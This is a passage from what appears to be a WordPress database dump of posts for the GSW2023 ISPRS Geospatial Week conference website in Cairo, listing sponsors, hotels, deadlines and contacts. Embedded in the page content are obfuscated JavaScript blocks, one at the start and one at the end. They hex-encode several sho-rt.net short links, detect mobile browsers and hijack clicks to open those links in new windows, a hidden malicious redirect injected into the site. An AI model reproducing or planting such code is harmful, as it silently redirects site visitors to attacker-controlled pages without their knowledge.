Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-05-18 03:18:49','2023-05-18 03:18:49','',3066,'https://gsw2023.com/?p=4557',0,'revision','',0),
(4560,1,'2023-05-24 23:05:37','2023-05-24 23:05:37','','Artboard 1','','inherit','open','closed','','artboard-1','','','2023-05-24 23:05:37','2023-05-24 23:05:37','',3066,'https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1.png',0,'attachment','image/png',0),
(4561,1,'2023-05-24 23:09:48','2023-05-24 23:09:48','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684201412150{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305146113{margin-top: 0px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969618657{margin-top: 0px !important;}\"]<a href=\"www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"full\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):            .</strong></p>\n<p><strong><del>April 15, 2023</del> ,</strong></p>\n<p><strong> May 15, 2023  (hard deadline, no extension)</strong><br />\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification:</strong></p>\n<p><strong><del>May 15, 2023</del>, May 21, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://m22.gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var 